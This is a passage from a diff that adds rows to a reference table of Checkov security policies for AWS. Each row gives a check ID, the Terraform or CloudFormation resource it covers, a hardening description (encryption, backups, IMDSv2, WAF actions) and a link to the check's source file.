+|  787 | CKV_AWS_341              | resource                         | aws_launch_template                                                                              | Ensure Launch template should not have a metadata response hop limit greater than 1                                                                                                                      | Terraform               | [LaunchTemplateMetadataHop.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LaunchTemplateMetadataHop.py)                                                                             |
+|  788 | CKV_AWS_342              | resource                         | aws_waf_rule_group                                                                               | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  789 | CKV_AWS_342              | resource                         | aws_waf_web_acl                                                                                  | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  790 | CKV_AWS_342              | resource                         | aws_wafregional_rule_group                                                                       | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  791 | CKV_AWS_342              | resource                         | aws_wafregional_web_acl                                                                          | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  792 | CKV_AWS_342              | resource                         | aws_wafv2_rule_group                                                                             | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  793 | CKV_AWS_342              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF rule has any actions                                                                                                                                                                          | Terraform               | [WAFRuleHasAnyActions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFRuleHasAnyActions.py)                                                                                       |
+|  794 | CKV_AWS_343              | resource                         | aws_redshift_cluster                                                                             | Ensure Amazon Redshift clusters should have automatic snapshots enabled                                                                                                                                  | Terraform               | [RedshiftClusterAutoSnap.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterAutoSnap.py)                                                                                 |
+|  795 | CKV_AWS_344              | resource                         | aws_networkfirewall_firewall                                                                     | Ensure that Network firewalls have deletion protection enabled                                                                                                                                           | Terraform               | [NetworkFirewallDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallDeletionProtection.py)                                                             |
+|  796 | CKV_AWS_345              | resource                         | aws_networkfirewall_firewall                                                                     | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform               | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                                   |
+|  797 | CKV_AWS_345              | resource                         | aws_networkfirewall_rule_group                                                                   | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform               | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                                   |
+|  798 | CKV_AWS_346              | resource                         | aws_networkfirewall_firewall_policy                                                              | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK)                                                                                                | Terraform               | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py)                                                                 |
+|  799 | CKV_AWS_347              | resource                         | aws_neptune_cluster                                                                              | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                    | Terraform               | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py)                                                                   |
+|  800 | CKV_AWS_348              | resource                         | aws_iam_access_key                                                                               | Ensure IAM root user doesnt have Access keys                                                                                                                                                             | Terraform               | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py)                                                                                     |
+|  801 | CKV_AWS_349              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encrypts local disks                                                                                                                                           | Terraform               | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py)                                                                 |
+|  802 | CKV_AWS_350              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encrypts EBS disks                                                                                                                                             | Terraform               | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py)                                                                             |
+|  803 | CKV_AWS_351              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encrypts InTransit                                                                                                                                             | Terraform               | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py)                                                                 |
+|  804 | CKV_AWS_352              | resource                         | aws_network_acl_rule                                                                             | Ensure NACL ingress does not allow all Ports                                                                                                                                                             | Terraform               | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py)                                                                                   |
+|  805 | CKV_AWS_353              | resource                         | aws_db_instance                                                                                  | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform               | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                                   |
+|  806 | CKV_AWS_353              | resource                         | aws_rds_cluster_instance                                                                         | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform               | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                                   |
+|  807 | CKV_AWS_354              | resource                         | aws_db_instance                                                                                  | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform               | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                               |
+|  808 | CKV_AWS_354              | resource                         | aws_rds_cluster_instance                                                                         | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform               | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                               |
+|  809 | CKV_AWS_355              | resource                         | aws_iam_group_policy                                                                             | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  810 | CKV_AWS_355              | resource                         | aws_iam_policy                                                                                   | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  811 | CKV_AWS_355              | resource                         | aws_iam_role_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  812 | CKV_AWS_355              | resource                         | aws_iam_user_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  813 | CKV_AWS_355              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                                     |
+|  814 | CKV_AWS_356              | data                             | aws_iam_policy_document                                                                          | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py)                                                                                       |
+|  815 | CKV_AWS_357              | resource                         | aws_transfer_server                                                                              | Ensure Transfer Server allows only secure protocols                                                                                                                                                      | Terraform               | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py)                                                 |
+|  816 | CKV_AWS_358              | data                             | aws_iam_policy_document                                                                          | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization                                                                                                         | Terraform               | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py)                                                                           |
+|  817 | CKV_AWS_359              | resource                         | aws_neptune_cluster                                                                              | Neptune DB clusters should have IAM database authentication enabled                                                                                                                                      | Terraform               | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py)                             |
+|  818 | CKV_AWS_360              | resource                         | AWS::DocDB::DBCluster                                                                            | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Cloudformation          | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py)                                                                                  |
+|  819 | CKV_AWS_360              | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Terraform               | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py)                                                                                       |
+|  820 | CKV_AWS_361              | resource                         | AWS::Neptune::DBCluster                                                                          | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Cloudformation          | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                                |
+|  821 | CKV_AWS_361              | resource                         | aws_neptune_cluster                                                                              | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Terraform               | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                                     |
+|  822 | CKV_AWS_362              | resource                         | aws_neptune_cluster                                                                              | Neptune DB clusters should be configured to copy tags to snapshots                                                                                                                                       | Terraform               | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py)                                                       |
+|  823 | CKV_AWS_363              | resource                         | AWS::Lambda::Function                                                                            | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation          | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                            |
+|  824 | CKV_AWS_363              | resource                         | AWS::Serverless::Function                                                                        | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation          | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                            |
+|  825 | CKV_AWS_363              | resource                         | aws_lambda_function                                                                              | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Terraform               | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                                 |
+|  826 | CKV_AWS_364              | resource                         | AWS::Lambda::Permission                                                                          | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Cloudformation          | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py)                                                                            |
+|  827 | CKV_AWS_364              | resource                         | aws_lambda_permission                                                                            | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Terraform               | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py)                                                                                 |
+|  828 | CKV_AWS_365              | resource                         | aws_ses_configuration_set                                                                        | Ensure SES Configuration Set enforces TLS usage                                                                                                                                                          | Terraform               | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py)                                                                     |
+|  829 | CKV_AWS_366              | resource                         | AWS::Cognito::IdentityPool                                                                       | Ensure AWS Cognito identity pool does not allow unauthenticated guest access                                                                                                                             | Cloudformation          | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py)                                                          |
+|  830 | CKV_AWS_366              | resource                         | aws_cognito_identity_pool                                                                        | Ensure AWS Cognito identity pool does not allow unauthenticated guest access                                                                                                                             | Terraform               | [CognitoUnauthenticatedIdentities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CognitoUnauthenticatedIdentities.py)                                                               |
+|  831 | CKV_AWS_367              | resource                         | AWS::SageMaker::DataQualityJobDefinition                                                         | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts                                                                                                                             | Cloudformation          | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py)                                    |
+|  832 | CKV_AWS_367              | resource                         | aws_sagemaker_data_quality_job_definition                                                        | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt model artifacts                                                                                                                             | Terraform               | [SagemakerDataQualityJobDefinitionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionEncryption.py)                                         |
+|  833 | CKV_AWS_368              | resource                         | AWS::SageMaker::DataQualityJobDefinition                                                         | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume                                                                                                             | Cloudformation          | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py)                        |
+|  834 | CKV_AWS_368              | resource                         | aws_sagemaker_data_quality_job_definition                                                        | Ensure Amazon Sagemaker Data Quality Job uses KMS to encrypt data on attached storage volume                                                                                                             | Terraform               | [SagemakerDataQualityJobDefinitionVolumeEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionVolumeEncryption.py)                             |
+|  835 | CKV_AWS_369              | resource                         | AWS::SageMaker::DataQualityJobDefinition                                                         | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs                                                                                          | Cloudformation          | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py)                      |
+|  836 | CKV_AWS_369              | resource                         | aws_sagemaker_data_quality_job_definition                                                        | Ensure Amazon Sagemaker Data Quality Job encrypts all communications between instances used for monitoring jobs                                                                                          | Terraform               | [SagemakerDataQualityJobDefinitionTrafficEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDataQualityJobDefinitionTrafficEncryption.py)                           |
+|  837 | CKV_AWS_370              | resource                         | AWS::SageMaker::Model                                                                            | Ensure Amazon SageMaker model uses network isolation                                                                                                                                                     | Cloudformation          | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerModelWithNetworkIsolation.py)                                                      |
+|  838 | CKV_AWS_370              | resource                         | aws_sagemaker_model                                                                              | Ensure Amazon SageMaker model uses network isolation                                                                                                                                                     | Terraform               | [SagemakerModelWithNetworkIsolation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerModelWithNetworkIsolation.py)                                                           |
+|  839 | CKV_AWS_371              | resource                         | AWS::SageMaker::NotebookInstance                                                                 | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2                                                                                                                                         | Cloudformation          | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py)                                                |
+|  840 | CKV_AWS_371              | resource                         | aws_sagemaker_notebook_instance                                                                  | Ensure Amazon SageMaker Notebook Instance only allows for IMDSv2                                                                                                                                         | Terraform               | [SagemakerNotebookInstanceAllowsIMDSv2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerNotebookInstanceAllowsIMDSv2.py)                                                     |
+|  841 | CKV_AWS_372              | resource                         | aws_sagemaker_flow_definition                                                                    | Ensure Amazon SageMaker Flow Definition uses KMS for output configurations                                                                                                                               | Terraform               | [SagemakerFlowDefinitionUsesKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerFlowDefinitionUsesKMS.py)                                                                   |
+|  842 | CKV_AWS_373              | resource                         | AWS::Bedrock::Agent                                                                              | Ensure Bedrock Agent is encrypted with a CMK                                                                                                                                                             | Cloudformation          | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py)                                                                                |
+|  843 | CKV_AWS_373              | resource                         | aws_bedrockagent_agent                                                                           | Ensure Bedrock Agent is encrypted with a CMK                                                                                                                                                             | Terraform               | [BedrockAgentEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BedrockAgentEncrypted.py)                                                                                     |
+|  844 | CKV2_AWS_1               | resource                         | aws_network_acl                                                                                  | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform               | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                               |
+|  845 | CKV2_AWS_1               | resource                         | aws_subnet                                                                                       | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform               | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                               |
+|  846 | CKV2_AWS_2               | resource                         | aws_ebs_volume                                                                                   | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform               | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                             |
+|  847 | CKV2_AWS_2               | resource                         | aws_volume_attachment                                                                            | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform               | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                             |
+|  848 | CKV2_AWS_3               | resource                         | aws_guardduty_detector                                                                           | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform               | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                                   |
+|  849 | CKV2_AWS_3               | resource                         | aws_guardduty_organization_configuration                                                         | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform               | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                                   |
+|  850 | CKV2_AWS_4               | resource                         | aws_api_gateway_method_settings                                                                  | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform               | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                                     |
+|  851 | CKV2_AWS_4               | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform               | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                                     |
+|  852 | CKV2_AWS_5               | resource                         | aws_security_group                                                                               | Ensure that Security Groups are attached to another resource                                                                                                                                             | Terraform               | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml)                                                                               |
+|  853 | CKV2_AWS_6               | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform               | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                               |
+|  854 | CKV2_AWS_6               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform               | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                               |
+|  855 | CKV2_AWS_7               | resource                         | aws_emr_cluster                                                                                  | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform               | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                               |
+|  856 | CKV2_AWS_7               | resource                         | aws_security_group                                                                               | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform               | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                               |
+|  857 | CKV2_AWS_8               | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS clusters has backup plan of AWS Backup                                                                                                                                                   | Terraform               | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml)                                                                         |
+|  858 | CKV2_AWS_9               | resource                         | aws_backup_selection                                                                             | Ensure that EBS are added in the backup plans of AWS Backup                                                                                                                                              | Terraform               | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml)                                                                                           |
+|  859 | CKV2_AWS_10              | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail trails are integrated with CloudWatch Logs                                                                                                                                             | Terraform               | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml)                                                                         |
+|  860 | CKV2_AWS_11              | resource                         | aws_vpc                                                                                          | Ensure VPC flow logging is enabled in all VPCs                                                                                                                                                           | Terraform               | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml)                                                                                             |
+|  861 | CKV2_AWS_12              | resource                         | aws_default_security_group                                                                       | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform               | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                                   |
+|  862 | CKV2_AWS_12              | resource                         | aws_vpc                                                                                          | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform               | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                                   |
+|  863 | CKV2_AWS_14              | resource                         | aws_iam_group                                                                                    | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform               | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                                     |
+|  864 | CKV2_AWS_14              | resource                         | aws_iam_group_membership                                                                         | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform               | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                                     |
+|  865 | CKV2_AWS_15              | resource                         | aws_autoscaling_group                                                                            | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform               | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                           |
+|  866 | CKV2_AWS_15              | resource                         | aws_elb                                                                                          | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform               | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                           |
+|  867 | CKV2_AWS_15              | resource                         | aws_lb_target_group                                                                              | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform               | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                           |
+|  868 | CKV2_AWS_16              | resource                         | aws_appautoscaling_target                                                                        | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform               | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                                     |
+|  869 | CKV2_AWS_16              | resource                         | aws_dynamodb_table                                                                               | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform               | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                                     |
+|  870 | CKV2_AWS_18              | resource                         | aws_backup_selection                                                                             | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup                                                                                                    | Terraform               | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml)                                                                                           |
+|  871 | CKV2_AWS_19              | resource                         | aws_eip                                                                                          | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform               | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                               |
+|  872 | CKV2_AWS_19              | resource                         | aws_eip_association                                                                              | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform               | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                               |
+|  873 | CKV2_AWS_20              | resource                         | aws_alb                                                                                          | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  874 | CKV2_AWS_20              | resource                         | aws_alb_listener                                                                                 | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
+|  875 | CKV2_AWS_20              | resource                         | aws_lb                                                                                           | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                         |
